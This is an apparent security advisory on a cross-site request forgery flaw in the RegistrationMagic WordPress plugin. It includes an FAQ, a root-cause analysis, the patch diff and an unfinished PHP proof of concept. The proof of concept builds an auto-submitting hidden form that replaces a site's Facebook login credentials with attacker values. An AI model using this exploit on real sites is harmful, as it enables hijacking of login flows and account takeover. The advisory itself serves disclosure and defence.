What is CVE-2026-24374?

CVE-2026-24374 is a Cross-Site Request Forgery (CSRF) vulnerability found in the RegistrationMagic plugin for WordPress, specifically in versions up to and including 6.0.6.9. It allows unauthenticated attackers to trick site administrators into performing unauthorized actions, such as modifying social login settings.

How does this vulnerability work?

The vulnerability arises from missing nonce validation in the `save_login_integrations` function. An attacker can create a malicious webpage that submits a forged request to the WordPress admin endpoint, changing sensitive social login configurations if an administrator visits the page.

Who is affected by this vulnerability?

Any WordPress site using the RegistrationMagic plugin version 6.0.6.9 or earlier is affected. Site administrators should check their plugin version and update if necessary to mitigate the risk.

How can I check if my site is vulnerable?

To check if your site is vulnerable, navigate to the Plugins section in your WordPress admin panel and look for the RegistrationMagic plugin. Verify the version number; if it is 6.0.6.9 or earlier, your site is at risk.

How can I fix or mitigate this issue?

To mitigate this vulnerability, update the RegistrationMagic plugin to version 6.0.7.0 or later, where nonce verification has been implemented. Regularly check for updates to all plugins to maintain security.

What does the risk level 'Medium' mean?

A ‘Medium’ risk level, with a CVSS score of 4.3, indicates that while the vulnerability can be exploited, it requires some social engineering to succeed. Attackers need to trick an administrator into visiting a malicious page, which adds a layer of difficulty.

What could happen if this vulnerability is exploited?

If exploited, attackers could modify social login settings to redirect user authentication to malicious endpoints, leading to account takeovers or credential harvesting. This could severely disrupt user registration and login functionalities.

How does the proof of concept demonstrate the issue?

The proof of concept shows how an attacker can craft a malicious HTML page that submits a forged request to the vulnerable endpoint. When an administrator visits this page, the script automatically submits the request, changing the social login settings to values controlled by the attacker.

What is nonce validation and why is it important?

Nonce validation is a security measure in WordPress that helps prevent CSRF attacks by ensuring that requests are coming from legitimate users. It adds a unique token to forms that must be verified before processing, which was missing in the vulnerable function.

Are there any other security measures I should take?

In addition to updating vulnerable plugins, consider implementing security plugins that provide firewall protection, regular backups, and monitoring for suspicious activities. Educate administrators about phishing and social engineering tactics to reduce risks.

Where can I find more information on CVE-2026-24374?

More information about CVE-2026-24374 can be found on the official CVE database, security advisories from the plugin developers, and security blogs that analyze vulnerabilities. Staying informed about security updates is crucial for maintaining site safety.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-24374: RegistrationMagic <= 6.0.6.9 – Cross-Site Request Forgery (custom-registration-form-builder-with-submission-manager)

CVE ID CVE-2026-24374

Plugin custom-registration-form-builder-with-submission-manager

Severity Medium (CVSS 4.3)

CWE 352

Vulnerable Version 6.0.6.9

Patched Version 6.0.7.0

Disclosed January 9, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-24374:
The RegistrationMagic WordPress plugin, versions up to and including 6.0.6.9, contains a Cross-Site Request Forgery vulnerability in its social login integration settings update functionality. This vulnerability allows unauthenticated attackers to trick an administrator into performing unauthorized actions, such as modifying authentication settings, via a forged request.

Root Cause:
The vulnerability exists in the `save_login_integrations` function within the file `custom-registration-form-builder-with-submission-manager/admin/controllers/class_rm_login_manage_controller.php`. The function processes POST requests to update social login configuration settings (Facebook, Google, Twitter, etc.) without validating a WordPress nonce. Specifically, lines 374-415 in the vulnerable version execute the `save_options` method after checking only form validation via `$this->mv_handler->validateForm(“login-integrations”)`. The code lacks a nonce verification check before processing the `$request->req` parameters, which include sensitive API keys and client secrets.

Exploitation:
An attacker crafts a malicious HTML page containing a hidden form that targets the WordPress admin endpoint `admin.php?page=rm_login_sett_manage`. The form submits POST parameters corresponding to a social login type (e.g., `type=fb`, `enable_facebook=1`, `facebook_app_id=attacker_id`, `facebook_app_secret=attacker_secret`). When a logged-in administrator visits the malicious page, the form automatically submits, changing the plugin’s social login configuration to attacker-controlled values. This could redirect user authentication to malicious endpoints.

Patch Analysis:
The patch adds nonce verification to the `save_login_integrations` function. It inserts a conditional check at line 375: `if (!isset($request->req[‘social_login_nonce’]) || !wp_verify_nonce($request->req[‘social_login_nonce’], ‘social_login_nonce’))`. If the nonce check fails, the function sets an error via `RM_PFBC_Form::setError` and does not proceed to save options. The nonce field `social_login_nonce` is added to the corresponding form template in `admin/views/template_rm_login_integrations.php` at line 23 via `new Element_Hidden(“social_login_nonce”, wp_create_nonce(“social_login_nonce”))`. This ensures each form submission includes a unique, user-specific token that attackers cannot forge.

Impact:
Successful exploitation allows attackers to modify the plugin’s social login integration settings. This can lead to account takeover by redirecting authentication flows to attacker-controlled OAuth applications, credential harvesting via fake login pages, or disruption of user registration and login functionality. The attack requires social engineering to lure an administrator into clicking a link, but no authentication or special privileges are needed for the forged request itself.

Differential between vulnerable and patched code

Code Diff

--- a/custom-registration-form-builder-with-submission-manager/admin/class_rm_admin.php
+++ b/custom-registration-form-builder-with-submission-manager/admin/class_rm_admin.php
@@ -2336,8 +2336,6 @@

         }

-
-
         ?>

         <?php if($php_notice!=0): ?>
@@ -2354,20 +2352,6 @@

         <?php endif; ?>

-        <?php /* if($php_8_notice != 0 && isset($_GET['page']) && $_GET['page'] == 'rm_form_manage'):
-
-            if(version_compare(PHP_VERSION, '8.0.0', '>=')): ?>
-
-            <div id="rm-php-notice-warning" class="rm_admin_notice rm-notice-banner notice notice-warning is-dismissible">
-
-                <p><?php _e( 'You are using PHP 8. RegistrationMagic currently does not supports PHP 8 and you might see some unwanted errors or warnings. We are working on PHP 8 compatibility update and it will be available very soon.','custom-registration-form-builder-with-submission-manager'); ?> <a class="rm_dismiss" href="<?php echo esc_url($query_string).'rm_disable_php_8_notice=1' ?>"><?php _e('Dismiss','custom-registration-form-builder-with-submission-manager'); ?></a></p>
-
-            </div>
-
-            <?php endif;
-
-        endif; */ ?>
-
         <?php if($edd_notice!=0 &&  class_exists( 'Easy_Digital_Downloads')): ?>

             <div class="rm_admin_notice rm-notice-banner notice notice-success is-dismissible">
@@ -2378,8 +2362,6 @@

         <?php endif; ?>

-
-
         <?php if($wc_notice!=0 && class_exists( 'WooCommerce' )): ?>

             <div class="rm_admin_notice rm-notice-banner notice notice-success is-dismissible">
@@ -2390,6 +2372,18 @@

         <?php endif;

+        $modern_paypal = get_option('rm_option_paypal_modern_enable', false);
+        $p_client_id = get_option('rm_option_paypal_client_id', '');
+        $p_client_secret = get_option('rm_option_paypal_secret_key', '');
+        if($modern_paypal && !empty($p_client_id) && empty($p_client_secret)): ?>
+            <div class="rm_admin_notice_banner rm-notice-banner notice notice-error">
+                <p style="vertical-align:middle;">
+                    <span style="color:#d63638;font-size:20px;" aria-hidden="true">⚠️</span>
+                    <?php echo wp_kses_post(sprintf(__( '<strong>Your PayPal Secret Key</strong> is required to receive payments with RegistrationMagic form submissions. Please <strong>update your PayPal Secret Key</strong> from the <a href="%s">Payment Settings</a> to continue receiving payments.','custom-registration-form-builder-with-submission-manager'), esc_url(admin_url('admin.php?page=rm_options_payment')))); ?>
+                </p>
+            </div>
+        <?php endif;
+
         if (function_exists('is_multisite') && is_multisite()) {
             $nl_subscribed = get_site_option('rm_option_newsletter_subbed', false);
         } else {
--- a/custom-registration-form-builder-with-submission-manager/admin/controllers/class_rm_login_manage_controller.php
+++ b/custom-registration-form-builder-with-submission-manager/admin/controllers/class_rm_login_manage_controller.php
@@ -374,37 +374,42 @@
         $setting_service= new RM_Setting_Service();
         $setting_service->set_model($model);
         if($this->mv_handler->validateForm("login-integrations")) {
-            $options= array();
-            if($data->type=='fb'){
-                $options['enable_facebook'] = isset($request->req['enable_facebook']) ? "yes" : null;
-                $options['facebook_app_id'] = $request->req['facebook_app_id'];
-                $options['facebook_app_secret'] = $request->req['facebook_app_secret'];
+            // Check nonce
+            if (!isset($request->req['social_login_nonce']) || !wp_verify_nonce($request->req['social_login_nonce'], 'social_login_nonce')) {
+                RM_PFBC_Form::setError('login-integrations', esc_html__('Nonce check failed. Please try again.', 'custom-registration-form-builder-with-submission-manager'));
+            } else {
+                $options= array();
+                if($data->type=='fb'){
+                    $options['enable_facebook'] = isset($request->req['enable_facebook']) ? "yes" : null;
+                    $options['facebook_app_id'] = $request->req['facebook_app_id'];
+                    $options['facebook_app_secret'] = $request->req['facebook_app_secret'];
+                }
+                else if($data->type=='inst'){
+                    $options['enable_instagram_login'] = isset($request->req['enable_instagram_login']) ? "yes" : null;
+                    $options['instagram_client_id'] = $request->req['instagram_client_id'];
+                    $options['instagram_client_secret'] = $request->req['instagram_client_secret'];
+                }
+                else if($data->type=='win'){
+                    $options['enable_window_login'] = isset($request->req['enable_window_login']) ? "yes" : null;
+                    $options['windows_client_id'] = $request->req['windows_client_id'];
+                }
+                else if($data->type=='google'){
+                    $options['enable_gplus'] = isset($request->req['enable_gplus']) ? "yes" : null;
+                    $options['gplus_client_id'] = $request->req['gplus_client_id'];
+                }
+                else if($data->type=='tw'){
+                    $options['enable_twitter_login'] = isset($request->req['enable_twitter_login']) ? "yes" : null;
+                    $options['tw_consumer_key'] = $request->req['tw_consumer_key'];
+                    $options['tw_consumer_secret'] = $request->req['tw_consumer_secret'];
+                }
+                else if($data->type=='linked'){
+                    $options['enable_linked'] = isset($request->req['enable_linked']) ? "yes" : null;
+                    $options['linkedin_api_key'] = $request->req['linkedin_api_key'];
+                    $options['linkedin_secret_key'] = $request->req['linkedin_secret_key'];
+                }
+                $setting_service->save_options($options);
+                RM_Utilities::redirect(admin_url('/admin.php?page=rm_login_sett_manage'));
             }
-            else if($data->type=='inst'){
-                $options['enable_instagram_login'] = isset($request->req['enable_instagram_login']) ? "yes" : null;
-                $options['instagram_client_id'] = $request->req['instagram_client_id'];
-                $options['instagram_client_secret'] = $request->req['instagram_client_secret'];
-            }
-            else if($data->type=='win'){
-                $options['enable_window_login'] = isset($request->req['enable_window_login']) ? "yes" : null;
-                $options['windows_client_id'] = $request->req['windows_client_id'];
-            }
-            else if($data->type=='google'){
-                $options['enable_gplus'] = isset($request->req['enable_gplus']) ? "yes" : null;
-                $options['gplus_client_id'] = $request->req['gplus_client_id'];
-            }
-            else if($data->type=='tw'){
-                $options['enable_twitter_login'] = isset($request->req['enable_twitter_login']) ? "yes" : null;
-                $options['tw_consumer_key'] = $request->req['tw_consumer_key'];
-                $options['tw_consumer_secret'] = $request->req['tw_consumer_secret'];
-            }
-            else if($data->type=='linked'){
-                $options['enable_linked'] = isset($request->req['enable_linked']) ? "yes" : null;
-                $options['linkedin_api_key'] = $request->req['linkedin_api_key'];
-                $options['linkedin_secret_key'] = $request->req['linkedin_secret_key'];
-            }
-            $setting_service->save_options($options);
-            RM_Utilities::redirect(admin_url('/admin.php?page=rm_login_sett_manage'));
         }
         $data->options = $setting_service->get_options();
         $view = $this->mv_handler->setView("login_integrations");
--- a/custom-registration-form-builder-with-submission-manager/admin/controllers/class_rm_options_controller.php
+++ b/custom-registration-form-builder-with-submission-manager/admin/controllers/class_rm_options_controller.php
@@ -446,6 +446,7 @@
             $options_pp_pstyle = array("id" => "rm_pp_style_tb", "value" => $data['paypal_page_style'], "longDesc" => RM_UI_Strings::get('HELP_OPTIONS_PYMNT_PP_PAGESTYLE'));
             $options_pp_modern_enable = array("id"=> "rm_pp_modern_enable", "onclick" => "enable_paypal_modern_popup(this)", "value" => isset($data['paypal_modern_enable']) ? $data['paypal_modern_enable'] : '', "longDesc" => RM_UI_Strings::get('HELP_OPTIONS_PYMNT_PP_MODERN'));
             $options_pp_client_id = array("id"=> "rm_pp_modern_client_id", "value" => isset($data['paypal_client_id']) ? $data['paypal_client_id'] : '', "longDesc" => RM_UI_Strings::get('HELP_OPTIONS_PYMNT_PP_CLIENT_ID'));
+            $options_pp_secret_key = array("id"=> "rm_pp_modern_secret_key", "value" => isset($data['paypal_secret_key']) ? $data['paypal_secret_key'] : '',"longDesc" => RM_UI_Strings::get('HELP_OPTIONS_PYMNT_PP_SECRET_KEY'));
             $image_dir = plugin_dir_url(dirname(dirname(__FILE__))) . "images";
             $layout_checked_state = array('gold' => null, 'blue' => null, 'silver' => null, 'white'=> null, 'black'=> null);
             $selected_layout = isset($data['paypal_btn_color']) ? $data['paypal_btn_color'] : 'gold';
@@ -504,6 +505,8 @@
                                             new Element_HTML('<div class="childfieldsrow" id="rm_pp_modern_enable_childfieldsrow" style="'.$enable_modern_paypal.'">'),
                                             new Element_Textbox(RM_UI_Strings::get('LABEL_PAYPAL_CLIENT_ID'), "paypal_client_id", $options_pp_client_id),
                                             new Element_HTML("<span id='rm_pp_modern_client_error_msg' class='rm_pproc_error_msg' style='display:none;'>".esc_html__('PayPal Client ID is required', 'custom-registration-form-builder-with-submission-manager')."</span>"),
+                                            new Element_Textbox(RM_UI_Strings::get('LABEL_PAYPAL_SECRET_KEY'), "paypal_secret_key", $options_pp_secret_key),
+                                            new Element_HTML("<span id='rm_pp_modern_secret_error_msg' class='rm_pproc_error_msg' style='display:none;'>".esc_html__('PayPal Secret Key is required', 'custom-registration-form-builder-with-submission-manager')."</span>"),
                                             new Element_HTML($paypal_btn_colorhtml),
                                             new Element_HTML('</div>')
                                             ),
--- a/custom-registration-form-builder-with-submission-manager/admin/views/template_rm_login_integrations.php
+++ b/custom-registration-form-builder-with-submission-manager/admin/views/template_rm_login_integrations.php
@@ -20,6 +20,9 @@
             "prevent" => array("bootstrap", "jQuery"),
             "action" => ""
         ));
+
+        // Nonce
+        $form->addElement(new Element_Hidden("social_login_nonce", wp_create_nonce("social_login_nonce")));

         if($type=='fb'){
             if(RM_Utilities::is_ssl()){
--- a/custom-registration-form-builder-with-submission-manager/admin/views/template_rm_options_payment.php
+++ b/custom-registration-form-builder-with-submission-manager/admin/views/template_rm_options_payment.php
@@ -217,11 +217,17 @@
                 if(jQuery("input#rm_pp_modern_client_id").val().trim() == '') {
                     jQuery("input#rm_pp_modern_client_id").focus();
                     jQuery('span#rm_pp_modern_client_error_msg').show();
-
                     var rmErrorMsg = jQuery('span#rm_pp_modern_client_error_msg');
                     rmErrorMsg.insertAfter('#rm_pp_modern_client_id');
                     return;
                 }
+                if(jQuery("input#rm_pp_modern_secret_key").val().trim() == '') {
+                    jQuery("input#rm_pp_modern_secret_key").focus();
+                    jQuery('span#rm_pp_modern_secret_error_msg').show();
+                    var rmErrorMsg = jQuery('span#rm_pp_modern_secret_error_msg');
+                    rmErrorMsg.insertAfter('#rm_pp_modern_secret_key');
+                    return;
+                }
             } else if (jQuery("input#rm_pp_email_tb").val().trim() == '') {
                 jQuery("input#rm_pp_email_tb").focus();
                 jQuery('span#rm_pp_email_error_msg').show();
@@ -297,6 +303,11 @@
                 jQuery('span#rm_pp_modern_client_error_msg').hide();
             }
         });
+        jQuery("input#rm_pp_modern_secret_key").on('keyup', function() {
+            if(jQuery(this).val() != '') {
+                jQuery('span#rm_pp_modern_secret_error_msg').hide();
+            }
+        });

         jQuery("input#rm_pp_email_tb").on('keyup', function() {
             if(jQuery(this).val() != '') {
--- a/custom-registration-form-builder-with-submission-manager/includes/class_rm_ui_strings.php
+++ b/custom-registration-form-builder-with-submission-manager/includes/class_rm_ui_strings.php
@@ -4557,7 +4557,7 @@
             case 'LABEL_PAYPAL_CLIENT_ID':
                 return __('PayPal Client ID', 'custom-registration-form-builder-with-submission-manager');
             case 'HELP_OPTIONS_PYMNT_PP_CLIENT_ID':
-                return __('Client ID can be obtained from PayPal dashboard.', 'custom-registration-form-builder-with-submission-manager');
+                return __('Client ID can be obtained from your PayPal dashboard.', 'custom-registration-form-builder-with-submission-manager');
             case 'LABEL_OPTIONS_PAYPAL_BTN_COLOR':
                 return __('Button Color', 'custom-registration-form-builder-with-submission-manager');
             case 'HELP_OPTIONS_PAYPAL_BTN_COLOR':
@@ -4800,7 +4800,7 @@
             case 'LABEL_PAYPAL_SECRET_KEY':
                 return __("PayPal Secret Key", 'custom-registration-form-builder-with-submission-manager');
             case 'HELP_OPTIONS_PYMNT_PP_SECRET_KEY':
-                return __("Secret key is required only when form has subscription field.", 'custom-registration-form-builder-with-submission-manager');
+                return __("Secret key can be obtained from your PayPal dashboard.", 'custom-registration-form-builder-with-submission-manager');
             case 'FIELD_HELP_TEXT_SUBSCRIPTION_Not_Installed_Resctriction':
                 return __("RegistrationMagic Subscriptions Addons is required for this field to work. Please install and activate the RegistrationMagic Subscriptions Addons plugin.", 'custom-registration-form-builder-with-submission-manager');

--- a/custom-registration-form-builder-with-submission-manager/libs/factory/class_rm_field_factory_revamp.php
+++ b/custom-registration-form-builder-with-submission-manager/libs/factory/class_rm_field_factory_revamp.php
@@ -2285,13 +2285,14 @@
                     echo "<select " . $this->print_attributes($attributes) . " >";
                     foreach(RM_Utilities_Revamp::get_countries() as $ccode => $country) {
                         $ccode = strtolower(preg_replace('/.*[(.*)].*/', '$1', $ccode));
-                        if (isset($meta_value['country']) && $meta_value['country'] == $country) {
-                            $attributes['checked'] = 'checked';
-                        }
                         if(empty($ccode)) {
                             echo "<option value="">".esc_html($country)."</option>";
                         } else {
-                            echo "<option value="".esc_attr($country)."" data-code="".esc_attr($ccode)."">".esc_html($country)."</option>";
+                            if (isset($meta_value['country']) && $meta_value['country'] == $country) {
+                                echo "<option value="".esc_attr($country)."" data-code="".esc_attr($ccode)."" selected>".esc_html($country)."</option>";
+                            } else {
+                                echo "<option value="".esc_attr($country)."" data-code="".esc_attr($ccode)."">".esc_html($country)."</option>";
+                            }
                         }
                     }
                     echo "</select>";
@@ -2416,7 +2417,11 @@
                             if(empty($code)) {
                                 echo "<option value="">".esc_html($country)."</option>";
                             } else {
-                                echo "<option value="".esc_attr($country)."" data-code="".esc_attr($ccode)."">".esc_html($country)."</option>";
+                                if (isset($meta_value['country']) && $meta_value['country'] == $country) {
+                                    echo "<option value="".esc_attr($country)."" data-code="".esc_attr($ccode)."" selected>".esc_html($country)."</option>";
+                                } else {
+                                    echo "<option value="".esc_attr($country)."" data-code="".esc_attr($ccode)."">".esc_html($country)."</option>";
+                                }
                             }
                         }
                         echo "</select>";
--- a/custom-registration-form-builder-with-submission-manager/libs/factory/class_rm_form_factory_revamp.php
+++ b/custom-registration-form-builder-with-submission-manager/libs/factory/class_rm_form_factory_revamp.php
@@ -2005,6 +2005,17 @@
                                     }
                                     echo "<label for='rm_gateway_".wp_kses_post((string)$gateway)."'>".wp_kses_post($pay_procs_options[$gateway])."</label>";
                                     echo "</div>";
+                                    if ($gateway === 'paypal') {
+                                        $modern_paypal = get_option('rm_option_paypal_modern_enable', false);
+                                        $client_id = get_option('rm_option_paypal_client_id', '');
+                                        $client_secret = get_option('rm_option_paypal_secret_key', '');
+                                        if ($modern_paypal && !empty($client_id) && empty($client_secret)) {
+                                            echo "<div class='rm-paypal-modern-notice' style='background:#fff3cd;color:#856404;border:1px solid #ffeeba;padding:12px 16px;margin:10px 0;border-radius:4px;display:flex;align-items:center;font-weight:500;font-size:15px;'>"
+                                                ."<span style='margin-right:10px;display:inline-flex;align-items:center;'><svg xmlns='http://www.w3.org/2000/svg' width='20' height='20' fill='none' viewBox='0 0 24 24'><circle cx='12' cy='12' r='10' fill='#ff0000ff'/><path d='M12 8v4m0 4h.01' stroke='#ffffffff' stroke-width='2' stroke-linecap='round' stroke-linejoin='round'/></svg></span>"
+                                                .esc_html__('PayPal payment gateway isn't fully configured. Payments may not get updated correctly. Please contact site administrator to resolve this issue.', 'custom-registration-form-builder-with-submission-manager')
+                                                ."</div>";
+                                        }
+                                    }
                                 }
                             }
                             if(isset($form->form_options->show_total_price[0]) && $form->form_options->show_total_price[0] == 1) {
@@ -2687,7 +2698,7 @@
         ));
     }

-    private static function is_username_reserved($username_to_check) {
+    private function is_username_reserved($username_to_check) {
         if(empty($username_to_check))
             return false;

@@ -2702,7 +2713,7 @@
             return false;
     }

-    private static function show_subscription_checkboxes($form = null) {
+    private function show_subscription_checkboxes($form = null) {
         if(get_option('rm_option_enable_mailchimp') == 'yes' && $form->form_options->form_is_opt_in_checkbox == 1 && (isset($form->form_options->enable_mailchimp[0]) && $form->form_options->enable_mailchimp[0] == 1)) {
             //This outer div is added so that the optin text can be made full width by CSS.
             echo '<div class="rm_optin_text rm-subscription-wrap">';
--- a/custom-registration-form-builder-with-submission-manager/public/views/template_rm_login.php
+++ b/custom-registration-form-builder-with-submission-manager/public/views/template_rm_login.php
@@ -251,7 +251,7 @@
                             echo html_entity_decode(wp_kses((string)$data->linkedin_html,RM_Utilities::expanded_allowed_tags()));
                             echo html_entity_decode(wp_kses((string)$data->windows_html,RM_Utilities::expanded_allowed_tags()));
                             echo html_entity_decode(wp_kses((string)$data->twitter_html,RM_Utilities::expanded_allowed_tags()));
-                            echo html_entity_decode(wp_kses((string)$data->instagram_html,RM_Utilities::expanded_allowed_tags()));
+                            //echo html_entity_decode(wp_kses((string)$data->instagram_html,RM_Utilities::expanded_allowed_tags()));
                         }
                     ?>
                     </div>
--- a/custom-registration-form-builder-with-submission-manager/registration_magic.php
+++ b/custom-registration-form-builder-with-submission-manager/registration_magic.php
@@ -15,7 +15,7 @@
  * Plugin Name:       RegistrationMagic
  * Plugin URI:        http://www.registrationmagic.com
  * Description:       A powerful system for customizing registration forms, setting up paid registrations, tracking submissions, managing users, assigning user roles, analyzing stats, and much more!!
- * Version:           6.0.6.9
+ * Version:           6.0.7.0
  * Tags:              registration, form, custom, analytics, simple, submissions
  * Requires at least: 5.2.0
  * Requires PHP:      7.2
@@ -78,7 +78,7 @@
 */
 if(!defined('RM_PLUGIN_VERSION')) {
     define('RM_PLUGIN_BASENAME', plugin_basename(__FILE__ ));
-    define('RM_PLUGIN_VERSION', '6.0.6.9');
+    define('RM_PLUGIN_VERSION', '6.0.7.0');
     define('RM_DB_VERSION', 5.9);
     define('RM_SHOW_WHATSNEW_SPLASH', false);  //Set it to 'false' to disable whatsnew screen.
     //define FB SDK req flags. Flags should be combined using logical OR and should be checked using AND.
@@ -264,12 +264,6 @@

     register_activation_hook(__FILE__, 'RM_Activator::activate');
     register_deactivation_hook(__FILE__, 'RM_Deactivator::deactivate');
-    add_filter( 'auto_update_plugin', function( $update, $item ) {
-        if ( $item->plugin === RM_PLUGIN_BASENAME ) {
-            return false;
-        }
-        return $update;
-    }, 10, 2 );

     //Set up update check
     $rm_form_diary = array();
--- a/custom-registration-form-builder-with-submission-manager/services/class_rm_paypal_service.php
+++ b/custom-registration-form-builder-with-submission-manager/services/class_rm_paypal_service.php
@@ -321,23 +321,23 @@
         return $data; //We do not want form redirect to work in case paypal processing is going on.
     }

-    public function process_paypal_sdk_payment(){
-
+    public function process_paypal_sdk_payment() {
         if(check_ajax_referer('rm_ajax_secure','rm_sec_nonce')) {
-            if(!isset($_POST['transaction'])|| !is_array($_POST['transaction']) ){
+            if(!isset($_POST['transaction']) || !is_array($_POST['transaction']) ) {
                 wp_send_json_error(array('msg'=>__('Transaction not valid.','custom-registration-form-builder-with-submission-manager')));
             }
             $submission_id= isset($_POST['submission_id']) ? absint($_POST['submission_id']) : 0;
             empty($submission_id) ? wp_send_json_error(array('msg'=>__('Submission not valid.','custom-registration-form-builder-with-submission-manager'))) : '';
             $submission = new RM_Submissions();
-            if(!$submission->load_from_db($submission_id)){
+            if(!$submission->load_from_db($submission_id)) {
                 wp_send_json_error(array('msg'=>__('Submission not valid.','custom-registration-form-builder-with-submission-manager')));
             }
             $transaction = $_POST['transaction'];
             $log_id = isset($_POST['payment_id']) ? absint($_POST['payment_id']) : 0;
-            $status = isset($transaction['status']) ? strtolower($transaction['status']) : 'Pending';
-            $status = ucfirst($status);
+            //$status = isset($transaction['status']) ? strtolower($transaction['status']) : 'Pending';
+            //$status = ucfirst($status);
             $txn_id = isset($transaction['id']) ? $transaction['id'] : '';
+            $status = $this->validate_sdk_payment( $txn_id );
             $log_entry_id = RM_DBManager::update_row('PAYPAL_LOGS', $log_id, array(
                         'status' => $status,
                         'txn_id' => $txn_id,
@@ -351,7 +351,6 @@
             }
             if($status == 'Completed') {
                 if ($_POST['user_id']){
-                    $gopt = new RM_Options;
                     if ($check_setting == "yes"){
                         $user_service = new RM_User_Services();
                         $user_service->activate_user_by_id($_POST['user_id']);
@@ -368,11 +367,82 @@
                 $response['log_id']= $log_id;
             }
             wp_send_json_success($response);
-        }
-        else{
+        } else {
             wp_send_json_error(array('msg'=>__('Submission not valid.','custom-registration-form-builder-with-submission-manager')));
         }
     }
+
+    public function validate_sdk_payment( $transaction_id ) {
+        $gopts = new RM_Options;
+        $sandbox =  $gopts->get_value_of('paypal_test_mode') === 'yes' ? true : false;
+
+        // PayPal API keys
+        $client_id = $gopts->get_value_of('paypal_client_id');
+        $secret    = $gopts->get_value_of('paypal_secret_key');
+
+        // PayPal REST API endpoint
+        $paypal_api = $sandbox
+            ? 'https://api.sandbox.paypal.com'
+            : 'https://api.paypal.com';
+
+        /*
+        * 1. Get OAuth Access Token
+        */
+        $token_response = wp_remote_post( "$paypal_api/v1/oauth2/token", [
+            'method'      => 'POST',
+            'timeout'     => 60,
+            'headers'     => [
+                'Authorization' => 'Basic ' . base64_encode( "$client_id:$secret" ),
+            ],
+            'body'        => 'grant_type=client_credentials',
+        ]);
+
+        if ( is_wp_error( $token_response ) ) {
+            return 'Pending';
+        }
+
+        $token_body = json_decode( wp_remote_retrieve_body( $token_response ), true );
+
+        if ( empty( $token_body['access_token'] ) ) {
+            return 'Pending';
+        }
+
+        $access_token = $token_body['access_token'];
+
+        /*
+        * 2. Fetch transaction details (only to check if it exists)
+        */
+        $payment_response = wp_remote_get( "$paypal_api/v2/payments/captures/$transaction_id", [
+            'timeout' => 60,
+            'headers' => [
+                'Authorization' => "Bearer $access_token",
+                'Content-Type'  => 'application/json',
+            ],
+        ]);
+
+        if ( is_wp_error( $payment_response ) ) {
+            return 'Pending';
+        }
+
+        $payment_data = json_decode( wp_remote_retrieve_body( $payment_response ), true );
+
+        if ( empty( $payment_data['status'] ) ) {
+            return 'Pending';
+        }
+
+        /*
+        * 3. Validate PayPal status only
+        */
+        if ( $payment_data['status'] !== 'COMPLETED' ) {
+            return 'Pending';
+        }
+
+        /*
+        * SUCCESS
+        */
+        return 'Completed';
+    }
+
     public function demo(){
         $response['msg'] .= '<div id="rmform">';
         $response['msg'] .= "<br><br><div class='rm-post-sub-msg'>";
@@ -406,6 +476,7 @@
         }
         $response['msg'] .= '</div>';
     }
+
     public function charge_popup($data, $pricing_details){
         $submission_id = $data->submission_id;
         $form_id= $data->form_id;
@@ -496,6 +567,7 @@
         ob_end_clean();
         return $data;
     }
+
     public function refund() {

     }
@@ -504,5 +576,4 @@

     }

-}
-
+}
 No newline at end of file
--- a/custom-registration-form-builder-with-submission-manager/services/class_rm_user_services.php
+++ b/custom-registration-form-builder-with-submission-manager/services/class_rm_user_services.php
@@ -799,7 +799,7 @@
                         }
                     }
                 } else
-                    die('Error: Unable to fetch email address from Facebbok.');
+                    die(esc_html__('Error: Unable to fetch email address from Facebook.', 'custom-registration-form-builder-with-submission-manager'));
             }
         }

@@ -869,6 +869,7 @@
                 if(empty($accessToken))
                     break;

+
                 $gopts = new RM_Options;
                 $fb_app_id = $gopts->get_value_of('facebook_app_id');
                 $fb_app_secret = $gopts->get_value_of('facebook_app_secret');
@@ -884,7 +885,7 @@
             case 'google':
                 $login_success = $this->google_login_callback(sanitize_text_field($_POST['token']), $user_email);
                 break;
-            case 'instagram':
+            /* case 'instagram':
                 $response = wp_remote_get('https://graph.instagram.com/v12.0/me?fields=id,username&access_token='.sanitize_text_field($_POST['token']));
                 $response = json_decode(wp_remote_retrieve_body($response));
                 if(isset($response->username)) {
@@ -892,7 +893,7 @@
                     $user_fname = '';
                     $login_success = true;
                 }
-                break;
+                break; */
             default:
                 break;
         }

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-24374 - RegistrationMagic <= 6.0.6.9 - Cross-Site Request Forgery

<?php
/**
 * Proof of Concept for CVE-2026-24374
 * Targets RegistrationMagic plugin <= 6.0.6.9
 * Exploits missing nonce validation in social login settings update.
 *
 * Usage: Place this script on an attacker-controlled server.
 *        Send the URL to a logged-in WordPress administrator.
 *        When visited, the script will automatically submit a forged request
 *        to change the Facebook login settings to attacker-controlled values.
 */

// Configuration
$target_url = 'http://vulnerable-site.com/wp-admin/admin.php';
$attacker_app_id = 'ATTACKER_FACEBOOK_APP_ID';
$attacker_app_secret = 'ATTACKER_FACEBOOK_APP_SECRET';

// The page parameter triggers the vulnerable controller
$action_url = $target_url . '?page=rm_login_sett_manage';

// Craft the malicious form that auto-submits via JavaScript
?>
<!DOCTYPE html>
<html>
<head>
    <title>Loading...</title>
    <script>
        window.onload = function() {
            document.getElementById('exploitForm').submit();
        };
    </script>
</head>
<body>
    <h2>Please wait...</h2>
    <form id="exploitForm" action="<?php echo htmlspecialchars($action_url); ?>" method="POST">
        <!-- Type 'fb' targets Facebook login integration -->
        <input type="hidden" name="type" value="fb" />
        <!-- Enable Facebook login -->
        <input type="hidden" name="enable_facebook" value="1" />
        <!-- Replace legitimate Facebook App ID with attacker's ID -->
